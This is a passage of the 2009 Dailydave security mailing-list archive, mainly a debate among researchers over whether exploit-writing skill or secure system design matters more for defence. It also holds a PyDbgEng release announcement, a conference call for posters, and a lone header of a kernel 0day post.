"exploits" or XSS "exploits". I > mean "Here's a shell, now you get to install new programs and muck with > the router's configuration" exploits. > > For a lot of people (not you) it's hard to care about such things.
The > inevitable ennui sets in: "oh, not another one", "that one is similar to > one I found in 1992AD", "well, if you had good patch management that's > the best you can do!", etc. etc. > > The magic is in finding each one of these things unique and special and > worth of attention. > ... or, instead of being an exploit fetishist, one might try to design their network in such a way that a compromise of your network devices is not fatal. Same for PDF viewers, browsers, etc. and how you design your computer system. Sure, it's cool to write exploits -- that always impresses people. We also do that at ITL. E.g. we will be showing a couple of VM escape exploits during our upcoming virtualization training (and we really are excited about those exploits!), but the whole point is to illustrate how a good design (in that particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can mitigate a problem of exploits, even if we cannot find and patch them all. I think one should not forget that an exploit, no matter how cool, is only an illustration of a problem. The actual solutions often have nothing to do with how exploits are written. Do you really think VT-d designers were heap-overflow ninjas? I doubt. joanna. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/43b9c78b/attachment-0001.pgp From version5 at gmail.com Tue Jul 14 10:44:08 2009 From: version5 at gmail.com (nnp) Date: Tue, 14 Jul 2009 15:44:08 +0100 Subject: [Dailydave] Staying on the treadmill. 
In-Reply-To: <4A5C9119.50902@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> Message-ID: <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> Protection mechanisms being written by people who don't understand exploits is surely the reason many are broken within about 43 seconds of being released. On Tue, Jul 14, 2009 at 3:07 PM, Joanna Rutkowska wrote: > dave wrote: >> People (this means you) like to think hard about game changing events in >> the world of hacking. But just staying on the treadmill of exploit after >> exploit can be a game changing event. >> >> For example, today you may have noticed that Intevydis >> (http://www.intevydis.com/vulndisco.shtml) released as part of their >> latest exploit pack, some exploits for all the major access >> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I >> mean "Here's a shell, now you get to install new programs and muck with >> the router's configuration" exploits. >> >> For a lot of people (not you) it's hard to care about such things. The >> inevitable ennui sets in: "oh, not another one", "that one is similar to >> one I found in 1992AD", "well, if you had good patch management that's >> the best you can do!", etc. etc. >> >> The magic is in finding each one of these things unique and special and >> worth of attention. >> > > ... or, instead of being an exploit fetishist, one might try to design their > network in such a way that a compromise of your network devices is not fatal. > Same for PDF viewers, browsers, etc. and how you design your computer system. > > Sure, it's cool to write exploits -- that always impresses people. We also do > that at ITL. E.g. 
we will be showing a couple of VM escape exploits during our > upcoming virtualization training (and we really are excited about those > exploits!), but the whole point is to illustrate how a good design (in that > particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can > mitigate a problem of exploits, even if we cannot find and patch them all. > > I think one should not forget that an exploit, no matter how cool, is only an > illustration of a problem. The actual solutions often have nothing to do with > how exploits are written. Do you really think VT-d designers were heap-overflow > ninjas? I doubt. > > joanna. > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From joanna at invisiblethingslab.com Tue Jul 14 11:29:57 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 17:29:57 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> Message-ID: <4A5CA475.8030107@invisiblethingslab.com> nnp wrote: > Protection mechanisms being written by people who don't understand > exploits is surely the reason many are broken within about 43 seconds > of being released. > Sure, but there is a difference between "understanding exploits" and being an exploit fetishist. Some time ago I attended a security conference well known for having a very technical audience. I was told the majority of those people are up to date with all the recent advances in exploitation techniques -- heap overflows, getting around ASLR/NX, etc. But when I started my lecture, which was about Trusted Computing, it turned out the number of people who knew how TPM works was... close to zero!
And we're talking about some real basic stuff here, nothing fancy like TXT. Just what a PCR register is, and what are the advantages of trusted boot.

I actually read recently an interview with a well-known researcher, who I actually respect myself, who happily announced that he's protecting his laptop using an FDE software, and, to make it more secure, he's powering it down as often as possible (in order to mitigate possibility of cold-boot attacks). Interestingly, he didn't realize he actually makes it much easier for even a hotel maid to get his encryption key... This is so basic and yet has nothing to do with advanced exploit understanding.

Now, who do you think can provide more security into an organization, like e.g. a bank -- a heap-overflow ninja that can bypass ASLR on the most recent Vista, or a person who would realize that maybe it is worth buying a trusted-boot-supported full disk encryption (FDE) software, as otherwise it would be trivial for the *real* adversary to get around it? Or a person that can tell you that your employees should use 2 different desktop computers and would be able to decide how to split tasks and activities between the two?

Sure, experience in exploit writing is sometimes crucial. Probably it is of the utmost importance to e.g. OS kernel architects, who might attempt to build in all the anti-exploitation technologies into the OS (which is what they do in fact). Or to processor and chipset vendors. This requires great understanding of possible workarounds.

It is also important for governments for obvious reasons.

But very few people are OS kernel architects and governments' offensive teams. And the further you go, the less you need those extreme skills, which is exploit writing as it is today. If you are only a *consumer* of computer products (e.g. a bank, or an airport), then I really see no reason why you should even be able to understand the difference between a heap overflow vs. stack overflow.
You just need to understand what a shellcode is and what it can potentially do (i.e. everything). You should understand that SELinux will not provide you all the promised features, because it has big monolithic TCB (the Linux kernel) that represents a huge attack vector. But you don't need to know how to write an exploit for SELinux. etc. joanna. > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > Rutkowska wrote: >> dave wrote: >>> People (this means you) like to think hard about game changing events in >>> the world of hacking. But just staying on the treadmill of exploit after >>> exploit can be a game changing event. >>> >>> For example, today you may have noticed that Intevydis >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their >>> latest exploit pack, some exploits for all the major access >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I >>> mean "Here's a shell, now you get to install new programs and muck with >>> the router's configuration" exploits. >>> >>> For a lot of people (not you) it's hard to care about such things. The >>> inevitable ennui sets in: "oh, not another one", "that one is similar to >>> one I found in 1992AD", "well, if you had good patch management that's >>> the best you can do!", etc. etc. >>> >>> The magic is in finding each one of these things unique and special and >>> worth of attention. >>> >> ... or, instead of being an exploit fetishist, one might try to design their >> network in such a way that a compromise of your network devices is not fatal. >> Same for PDF viewers, browsers, etc. and how you design your computer system. >> >> Sure, it's cool to write exploits -- that always impresses people. We also do >> that at ITL. E.g. 
we will be showing a couple of VM escape exploits during our >> upcoming virtualization training (and we really are excited about those >> exploits!), but the whole point is to illustrate how a good design (in that >> particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can >> mitigate a problem of exploits, even if we cannot find and patch them all. >> >> I think one should not forget that an exploit, no matter how cool, is only an >> illustration of a problem. The actual solutions often have nothing to do with >> how exploits are written. Do you really think VT-d designers were heap-overflow >> ninjas? I doubt. >> >> joanna. >> >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> >> -- Joanna Rutkowska Founder/CEO Invisible Things Lab http://invisiblethingslab.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/ea9b255b/attachment.pgp From halvar at gmx.de Tue Jul 14 12:22:13 2009 From: halvar at gmx.de (Halvar Flake) Date: 14 Jul 2009 18:22:13 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5C9119.50902@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> Message-ID: <4A5CB0B5.7090003@gmx.de> Joanna wrote: >... or, instead of being an exploit fetishist, one might try to design their >network in such a way that a compromise of your network devices is not fatal. >Same for PDF viewers, browsers, etc. and how you design your computer system. Where would be the fun in that ? 
>I think one should not forget that an exploit, no matter how cool, is only an >illustration of a problem Strangely enough, we live in a world where the problems have a tendency to be much more interesting than the solutions. But it's difficult to argue about personal preferences. Cheers, Halvar From joanna at invisiblethingslab.com Tue Jul 14 12:25:22 2009 From: joanna at invisiblethingslab.com (Joanna Rutkowska) Date: Tue, 14 Jul 2009 18:25:22 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CB0B5.7090003@gmx.de> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <4A5CB0B5.7090003@gmx.de> Message-ID: <4A5CB172.9050706@invisiblethingslab.com> Halvar Flake wrote: > Joanna wrote: > >> ... or, instead of being an exploit fetishist, one might try to design their >> network in such a way that a compromise of your network devices is not fatal. >> Same for PDF viewers, browsers, etc. and how you design your computer system. > > Where would be the fun in that ? Excuse me, I'm confused, are we talking here about computer security or about sex? joanna. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 226 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/98d031c0/attachment.pgp From halvar at gmx.de Tue Jul 14 12:50:01 2009 From: halvar at gmx.de (Halvar Flake) Date: 14 Jul 2009 18:50:01 +0200 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CB172.9050706@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <4A5CB0B5.7090003@gmx.de> <4A5CB172.9050706@invisiblethingslab.com> Message-ID: <4A5CB739.5070208@gmx.de> >>> ... or, instead of being an exploit fetishist, one might try to design their >>> network in such a way that a compromise of your network devices is not fatal. 
>>> Same for PDF viewers, browsers, etc. and how you design your computer system. >>> >> Where would be the fun in that ? >> > > Excuse me, I'm confused, are we talking here about computer security or about sex? > > joanna. > As I am world-famous for my monk-like lifestyle, computer security. I wouldn't dare to comment on things that I have no clue about. From don.bailey at gmail.com Tue Jul 14 14:53:53 2009 From: don.bailey at gmail.com (Don Bailey) Date: Tue, 14 Jul 2009 11:53:53 -0700 Subject: [Dailydave] Staying on the treadmill. In-Reply-To: <4A5CA475.8030107@invisiblethingslab.com> References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> Message-ID: <68eb39920907141153r40494717pb57828268cdc3336@mail.gmail.com> I agree with Johanna here. Everyone that knows me would expect me to bang on the importance of exploits over and over. However, in the past year, I've come to realize that it's really about the threat model around the vulnerability you're exploiting. We can get as granular as we want into how to bypass X, Y, and Z, mitigation technology. At the end of the day it really comes down to securing the design, not the vulnerability. The fact that I can write a NULL kernel dereference exploit in (literally) 15 minutes has nothing to do with how cool NULL pointer exploits are or how insecure the operating system is. Rather, what it has to do with is the fact that I'm attacking a design flaw. Banging on the importance of protecting from NULL/Userland/Whatever-you-want-to-call-it-today dereference attacks isn't the point. The point is addressing it with defense in depth by integrating protection into the product design. Although, I do agree that understanding exploit strategy is an imperative when designing a secure system. If you don't know that X strategy exists, how do you protect it? 
While I do agree that generally you can build a threat model around unknowns and apply mitigation techniques that can compartmentalize potential threat sources that have exploited a given risk, I think that it may be easier to do this if the developer team knows about as many strategies as possible. So, I think there must be a balance. Your favorite kernel developer may not know understand heap feng shui, but I bet they understand heap overflow basics and know more about designing a proper heap abstraction than most exploit developers. D On Tue, Jul 14, 2009 at 8:29 AM, Joanna Rutkowska < joanna at invisiblethingslab.com> wrote: > nnp wrote: > > Protection mechanisms being written by people who don't understand > > exploits is surely the reason many are broken within about 43 seconds > > of being released. > > > > Sure, but there is a difference between "understanding exploits" and being > an > exploit fetishist. > > Some time ago I attended a security conference well known for having very > technical audience. I was told the majority of those people are up to date > with > all the recent advances in exploitation techniques -- heap overflows, > getting > around ASRL/NX, etc. But when I started my lecture, which was about Trusted > Computing, it turned the number of people who knew how TPM works was... > close to > zero! And we're talking about some real basic stuff here, nothing fancy > like > TXT. Just what a PCR register is, and what are the advantages of trusted > boot. > > I actually read recently an interview with a well know researcher, who I > actually respect myself, who happily announced that he's protecting his > laptop > using an FDE software, and, to make it more secure, he's powering it down > as > often as possible (in order to mitigate possibility of cold-boot attacks). > Interestingly, he didn't realize he actually makes it much easier for even > a > hotel maid to get his encryption key... 
This is so basic and yet have > nothing to > do with advanced exploit understanding. > > Now, who do you think can provide more security into an organization, like > e.g. > a bank -- a heap-overflow ninja that can bypass ASLR on the most recent > Vista, > or a person who would realize that maybe it is worth buying a > trusted-boot-supported full disk encryption (FDE) software, as otherwise it > would be trivial for the *real* adversary to get around it? Or a person > that can > tell you that your employees should use 2 different desktop computers and > would > be able to decide how to split tasks and activities between the two? > > Sure, experience in exploit writing is sometimes crucial. Probably it is of > the > utmost important to e.g. OS kernel architects, who might attempt to build > in all > the anti-exploitation technologies into the OS (which is what they do in > fact). > Or to processor and chipset vendors. This requires great understanding of > possible workarounds. > > It is also important for governments for obvious reasons. > > But very few people are OS kernel architects and governments offensive > teams. > And the further you go, the less you need those extreme skills, which is > exploit > writing as it is today. If you are only a *consumer* of computer products > (e.g. > a bank, or an airport), then I really see no reason why you should even be > able > to understand the difference between a heap overflow vs. stack overflow. > You > just need to understand what a shellcode is and what it can potentially do > (i.e. > everything). You should understand that SELinux will not provide you all > the > promised features, because it has big monolithic TCB (the Linux kernel) > that > represents a huge attack vector. But you don't need to know how to write an > exploit for SELinux. etc. > > joanna. 
> > > > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > > Rutkowska wrote: > >> dave wrote: > >>> People (this means you) like to think hard about game changing events > in > >>> the world of hacking. But just staying on the treadmill of exploit > after > >>> exploit can be a game changing event. > >>> > >>> For example, today you may have noticed that Intevydis > >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their > >>> latest exploit pack, some exploits for all the major access > >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I > >>> mean "Here's a shell, now you get to install new programs and muck with > >>> the router's configuration" exploits. > >>> > >>> For a lot of people (not you) it's hard to care about such things. The > >>> inevitable ennui sets in: "oh, not another one", "that one is similar > to > >>> one I found in 1992AD", "well, if you had good patch management that's > >>> the best you can do!", etc. etc. > >>> > >>> The magic is in finding each one of these things unique and special and > >>> worth of attention. > >>> > >> ... or, instead of being an exploit fetishist, one might try to design > their > >> network in such a way that a compromise of your network devices is not > fatal. > >> Same for PDF viewers, browsers, etc. and how you design your computer > system. > >> > >> Sure, it's cool to write exploits -- that always impresses people. We > also do > >> that at ITL. E.g. we will be showing a couple of VM escape exploits > during our > >> upcoming virtualization training (and we really are excited about those > >> exploits!), but the whole point is to illustrate how a good design (in > that > >> particular case of your hypervisor) and new technologies (e.g. VT-d or > TXT) can > >> mitigate a problem of exploits, even if we cannot find and patch them > all. > >> > >> I think one should not forget that an exploit, no matter how cool, is > only an > >> illustration of a problem. 
The actual solutions often have nothing to do > with > >> how exploits are written. Do you really think VT-d designers were > heap-overflow > >> ninjas? I doubt. > >> > >> joanna. > >> > >> > >> _______________________________________________ > >> Dailydave mailing list > >> Dailydave at lists.immunitysec.com > >> http://lists.immunitysec.com/mailman/listinfo/dailydave > >> > >> > > > -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090714/413d0b6c/attachment-0001.htm From meddington at gmail.com Wed Jul 15 02:22:13 2009 From: meddington at gmail.com (Michael Eddington) Date: Tue, 14 Jul 2009 23:22:13 -0700 Subject: [Dailydave] Announce: PyDbgEng v0.10 Message-ID: <2db0cefa0907142322l2c643040m10cef57c25ac7439@mail.gmail.com> Seems I'm the new maintainer for PyDbgEng, the first (that I'm aware of) Python wrapper for the WinDbg COM object DbgEng. This new version includes all the changes I have made while using PyDbgEng with Peach. This includes removing the native code requirements (now pure python), adding support for the latest comtypes libraries, and testing with 64bit Python/WinDbg. PyDbgEng now installs as a normal python module (python setup.py install) and will locate WinDbg if installed to any semi-normal place. Should "Just work" for most people. Also included is a py2exe setup script for the advanced user. The module has proven stable under heavy use for the last year or so. Patches and bug fixes always welcome!
http://sourceforge.net/projects/pydbgeng/

mike

From mjw at cyberwart.com Wed Jul 15 11:16:59 2009
From: mjw at cyberwart.com (Matthew Wollenweber)
Date: Wed, 15 Jul 2009 11:16:59 -0400
Subject: [Dailydave] Staying on the treadmill.
In-Reply-To: <4A5CA475.8030107@invisiblethingslab.com>
References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com>
Message-ID: <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com>

> I actually read recently an interview with a well known researcher, who I
> actually respect myself, who happily announced that he's protecting his laptop
> using an FDE software, and, to make it more secure, he's powering it down as
> often as possible (in order to mitigate possibility of cold-boot attacks).
> Interestingly, he didn't realize he actually makes it much easier for even a
> hotel maid to get his encryption key... This is so basic and yet have nothing to
> do with advanced exploit understanding.

Several years ago I was an intern at NASA. One of the things they like to do to interns is give them senseless tours. During one such tour I learned that they were very excited about updating computers going into space with a 386 processor. It had taken them more than 10 years to evaluate and reduce risk to acceptable levels. Even then, I was told there were 2 backups -- just in case.

My point is that you can have a fetish for esoteric attacks where the hotel maid is stealing fde passwords and spend years developing mitigations. You can even go further trying to build 'secure systems' or 'trusted computing', but if you can do it within a time period applicable to people or before the use cases and attack vectors completely shift, I'd be truly surprised.
Building something that will withstand anything that goes wrong is exponentially more complicated and time consuming than refining systems that minimize evolving known risks.

The much more probable attacks are that the researcher's laptop is lost, stolen, or that while online it's compromised by a heap-overflow ninja with an IE/Firefox/whatever exploit. So with FDE and understanding heap-overflow ninjitsu he's probably better off than waiting for trusted computing.

Then again, I much preferred the portion of the tour with the room size speaker that shook satellites to see what would fall off and break. When it did, they determined the problem and fixed it... much like the exploit writers. When an exploit is part of a process then it's much more than simply demonstrating a problem -- it's iteratively finding and fixing the weak spots.

On Tue, Jul 14, 2009 at 11:29 AM, Joanna Rutkowska <joanna at invisiblethingslab.com> wrote:

> nnp wrote:
> > Protection mechanisms being written by people who don't understand
> > exploits is surely the reason many are broken within about 43 seconds
> > of being released.
> >
>
> Sure, but there is a difference between "understanding exploits" and being an
> exploit fetishist.
>
> Some time ago I attended a security conference well known for having very
> technical audience. I was told the majority of those people are up to date with
> all the recent advances in exploitation techniques -- heap overflows, getting
> around ASLR/NX, etc. But when I started my lecture, which was about Trusted
> Computing, it turned out the number of people who knew how TPM works was... close to
> zero! And we're talking about some real basic stuff here, nothing fancy like
> TXT. Just what a PCR register is, and what are the advantages of trusted
> boot.
> > I actually read recently an interview with a well know researcher, who I > actually respect myself, who happily announced that he's protecting his > laptop > using an FDE software, and, to make it more secure, he's powering it down > as > often as possible (in order to mitigate possibility of cold-boot attacks). > Interestingly, he didn't realize he actually makes it much easier for even > a > hotel maid to get his encryption key... This is so basic and yet have > nothing to > do with advanced exploit understanding. > > Now, who do you think can provide more security into an organization, like > e.g. > a bank -- a heap-overflow ninja that can bypass ASLR on the most recent > Vista, > or a person who would realize that maybe it is worth buying a > trusted-boot-supported full disk encryption (FDE) software, as otherwise it > would be trivial for the *real* adversary to get around it? Or a person > that can > tell you that your employees should use 2 different desktop computers and > would > be able to decide how to split tasks and activities between the two? > > Sure, experience in exploit writing is sometimes crucial. Probably it is of > the > utmost important to e.g. OS kernel architects, who might attempt to build > in all > the anti-exploitation technologies into the OS (which is what they do in > fact). > Or to processor and chipset vendors. This requires great understanding of > possible workarounds. > > It is also important for governments for obvious reasons. > > But very few people are OS kernel architects and governments offensive > teams. > And the further you go, the less you need those extreme skills, which is > exploit > writing as it is today. If you are only a *consumer* of computer products > (e.g. > a bank, or an airport), then I really see no reason why you should even be > able > to understand the difference between a heap overflow vs. stack overflow. > You > just need to understand what a shellcode is and what it can potentially do > (i.e. 
> everything). You should understand that SELinux will not provide you all > the > promised features, because it has big monolithic TCB (the Linux kernel) > that > represents a huge attack vector. But you don't need to know how to write an > exploit for SELinux. etc. > > joanna. > > > > On Tue, Jul 14, 2009 at 3:07 PM, Joanna > > Rutkowska wrote: > >> dave wrote: > >>> People (this means you) like to think hard about game changing events > in > >>> the world of hacking. But just staying on the treadmill of exploit > after > >>> exploit can be a game changing event. > >>> > >>> For example, today you may have noticed that Intevydis > >>> (http://www.intevydis.com/vulndisco.shtml) released as part of their > >>> latest exploit pack, some exploits for all the major access > >>> point/mini-router firmwares. Not CSRF "exploits" or XSS "exploits". I > >>> mean "Here's a shell, now you get to install new programs and muck with > >>> the router's configuration" exploits. > >>> > >>> For a lot of people (not you) it's hard to care about such things. The > >>> inevitable ennui sets in: "oh, not another one", "that one is similar > to > >>> one I found in 1992AD", "well, if you had good patch management that's > >>> the best you can do!", etc. etc. > >>> > >>> The magic is in finding each one of these things unique and special and > >>> worth of attention. > >>> > >> ... or, instead of being an exploit fetishist, one might try to design > their > >> network in such a way that a compromise of your network devices is not > fatal. > >> Same for PDF viewers, browsers, etc. and how you design your computer > system. > >> > >> Sure, it's cool to write exploits -- that always impresses people. We > also do > >> that at ITL. E.g. 
> >> we will be showing a couple of VM escape exploits during our
> >> upcoming virtualization training (and we really are excited about those
> >> exploits!), but the whole point is to illustrate how a good design (in that
> >> particular case of your hypervisor) and new technologies (e.g. VT-d or TXT) can
> >> mitigate a problem of exploits, even if we cannot find and patch them all.
> >>
> >> I think one should not forget that an exploit, no matter how cool, is only an
> >> illustration of a problem. The actual solutions often have nothing to do with
> >> how exploits are written. Do you really think VT-d designers were heap-overflow
> >> ninjas? I doubt.
> >>
> >> joanna.
>
> --
> Joanna Rutkowska
> Founder/CEO
> Invisible Things Lab
> http://invisiblethingslab.com/

--
Matthew Wollenweber
mjw at cyberwart.com
703-395-5036

From joanna at invisiblethingslab.com Wed Jul 15 11:40:05 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 15 Jul 2009 17:40:05 +0200
Subject: [Dailydave] Staying on the treadmill.
In-Reply-To: <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com>
References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com>
Message-ID: <4A5DF855.8030305@invisiblethingslab.com>

Matthew Wollenweber wrote:

> My point is that you can have a fetish for esoteric attacks where the hotel
> maid is stealing fde passwords and spend years developing mitigations.

You got it backwards! The example of hotel maid stealing your FDE password was a *simple* attack, for which we already have off-the-shelf solutions (e.g. Bitlocker).

> The much more probable attacks are that the researcher's laptop is lost,
> stolen, or that while online it's compromised by a heap-overflow ninja with
> an IE/Firefox/whatever exploit.

But when designing your security, you should assume that this will always happen on your daily-use browser. It is a mistake to think otherwise.

> So with FDE and understanding heap-overflow ninjitsu he's probably better off
> than waiting for trusted computing.
>

So, how's the heap-overflow ninja can help mitigate those browser attacks? By spending 4543523444234533 days looking at the code of all the applications that your company uses and finding all possible overflows and other bugs there? ;)

> Then again, I much preferred the portion of the tour with the room size
> speaker that shook satellites to see what would fall off and break. When it
> did, they determined the problem and fixed it... much like the exploit
> writers. When an exploit is part of a process then it's much more than
> simply demonstrating a problem -- it's iteratively finding and fixing the
> weak spots.
>

So, you're saying that fuzzing is the "much preferred" way? Even if we assumed this to be true (which is not, of course), then still, I'm asking you, why do an organization need heap overflow ninja?
To operate the shaking speaker, errm, fuzzer? ;)

joanna.

From halvar at gmx.de Wed Jul 15 18:23:33 2009
From: halvar at gmx.de (Halvar Flake)
Date: 16 Jul 2009 00:23:33 +0200
Subject: [Dailydave] Staying on the treadmill.
In-Reply-To: <4A5E0ABB.9060606@invisiblethingslab.com>
References: <4A5C88E4.90502@immunityinc.com> <4A5C9119.50902@invisiblethingslab.com> <28749c0e0907140744p4167bb5br254fc7b2ffa9bd32@mail.gmail.com> <4A5CA475.8030107@invisiblethingslab.com> <5fb633320907150816t78258526o7168e5186be5d36b@mail.gmail.com> <4A5DF855.8030305@invisiblethingslab.com> <5fb633320907150931r3ad4c189v59192a31d4b0f400@mail.gmail.com> <4A5E0ABB.9060606@invisiblethingslab.com>
Message-ID: <4A5E56E5.6010604@gmx.de>

In order to continue my tradition of mostly nonsensical posts:

Joanna wrote:

> No! I highly respect all the people who demonstrated how different things are
> possible. When you show an exploit that attacks things that have never been
> attacked before, it is extremely useful. Remember Solar Designer's JPEG Netscape
> *first* public heap overflow? Now, that's what matters.
>
> But coming up with yet-another-one client-side exploit for Browser/PDF
> viewer/etc usually is meaningless. We have seen enough such exploits to
> understand that currently used mitigations do not work (apps code audit, apps
> fuzzing, ASLR, NX), and that we should assume any desktop application that takes
> untrusted input can be exploited. And we need to address the problem in a
> different way, with the assumption that even some applications on my desktops
> gets compromised that others still work. Today's OSes do not provide this feature.
>

I wholeheartedly agree.
It has long been my (and my employers) position that there are way too many presentations of exploitation techniques. I therefore propose that we alter this years' Blackhat schedule as follows: - Remove the John McDonald / Chris Valasek talk - Remove FX's talk - Remove the Dowd/Smith/Dewey talk - Remove Kostya's talk Instead, I think we should substitute at least two of these with fundamental talks about trusted computing, one with a talk about homomorphic encryption, on smartcards and one with a talk about visual spoofing. I would like some songs, too. And *plenty* of architecture diagrams please, perhaps with a security proof thrown in. :-P > It was joked away, because we are not paid for having fun, but for (trying) to > solve the actual problems our customers might have. I'm yet to find a company > that would be advertising their services as "hire us, so *we* could have some > fun". Have you seen one? Halvar's maybe? Or is it rather "hire us, we will help > you *solve* your problems?" > I would prefer to advertise: "You might have some problems that we would have a ton of fun with. If you make sure we don't starve while having fun with these problems, we'll do an excellent job -- we love our work, and take pride in it. Would you prefer to hire someone that likes his work, or someone that gets paid to pretend to like it ?" :-) Holy crap, where has the lightheartedness gone ? Could we *please* all quit taking ourselves quite so seriously ? I am looking forwards to seeing y'all in Vegas in 10 days. 
Cheers,
Halvar

From jlloret at dcom.upv.es Thu Jul 16 04:28:51 2009
From: jlloret at dcom.upv.es (Jaime Lloret Mauri)
Date: Thu, 16 Jul 2009 10:28:51 +0200
Subject: [Dailydave] 1st Call for Posters and Industrial Presentations | ComputationWorld 2009 / Athens-Greece, November 15-20, 2009
Message-ID: <200907160828.n6G8Sp2g013171@smtp.upv.es>

INVITATION

Please consider to contribute and encourage your team members and fellow scientists to contribute to the following federated events. Thanks for forwarding the information on this Call for Posters and Industrial presentations to those potentially interested to submit.

===== Call for Posters and Industrial Presentations =======

ComputationWorld 2009, November 15-20, 2009 - Athens, Greece
see: http://www.iaria.org/conferences2009/ComputationWorld09.html

ComputationWorld 2009 is a federated event focusing on advanced topics concerning the areas of computation. The target topics cover future computing techniques (strategies, mechanisms, technologies), service computation (ubiquitous, web services, societal), cognitive support (AI, agents, learning, autonomy), adaptiveness (component/systems, self-features, metrics), creative content technologies, and patterns.

Submission (Poster, Industrial presentations) deadline: October 1st, 2009.
Acceptance notification: October 15, 2009
Submission form: 12-14 slide deck, free format; they will be posted, post-conference, at www.iaria.org.

Submissions must be electronically done using the "Submit a Paper" button on the entry page of each conference listed below.

See a 'very preliminary program'.
http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html
http://www.iaria.org/conferences2009/ProgramFUTURECOMPUTING09.html

The events will feature well known Keynote Speakers:

The Tempestuous Future of Computing - Every Cloud Engenders not a Storm by Paul J.
Geraci, Director, TSG/DoD, USA

Infrastructures and Technologies for Future Computing - Convergence of Bandwidth, Clouds, and Smart Devices by Wolfgang Gentzsch, EU Project DEISA & Board of Directors OGF

Services -- The Next Major Frontier for Research & Innovation by Krishna Singh, President, Service Research & Innovation Institute (SRII) / Strategic Programs Director, Service Science Research, IBM Almaden Research Center

EXPERT PANEL: Services Computing: Challenge or Opportunity
Moderators: Krishna Singh, IBM / SRII
Petre Dini, IARIA / Concordia University

A few access free tutorials will be provided for all participants. Scientific papers will be presented in more than 30 regular sessions. Special forum meetings on challenging topics will be organized, late, in the afternoons. We aim at some instructive Poster and Special Industrial presentations to complete the spectrum of topics covered by the events.

The events are:

>> FUTURE COMPUTING 2009, The First International Conference on Future Computational Technologies and Applications
http://www.iaria.org/conferences2009/FUTURECOMPUTING09.html

>> SERVICE COMPUTATION 2009, The First International Conferences on Advanced Service Computing
http://www.iaria.org/conferences2009/SERVICECOMPUTATION09.html

>> COGNITIVE 2009, The First International Conference on Advanced Cognitive Technologies and Applications
http://www.iaria.org/conferences2009/COGNITIVE09.html

>> ADAPTIVE 2009, The First International Conference on Adaptive and Self-adaptive Systems and Applications
http://www.iaria.org/conferences2009/ADAPTIVE09.html

>> CONTENT 2009, The First International Conference on Creative Content Technologies
http://www.iaria.org/conferences2009/CONTENT09.html

>> PATTERNS 2009, The First International Conferences on Pervasive Patterns and Applications
http://www.iaria.org/conferences2009/PATTERNS09.html

>> SELFTRUST 2009, The First Workshop on Computational Trust for Self-Adaptive Systems
http://www.iaria.org/conferences2009/SELFTRUST.html

--------------------------------
IARIA Publicity Board
ComputationWorld Advisory Committees
-------------------------------

From spender at grsecurity.net Thu Jul 16 20:57:36 2009
From: spender at grsecurity.net (Brad Spengler)
Date: Thu, 16 Jul 2009 20:57:36 -0400
Subject: [Dailydave] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
Message-ID: <20090717005736.GA25295@grsecurity.net>

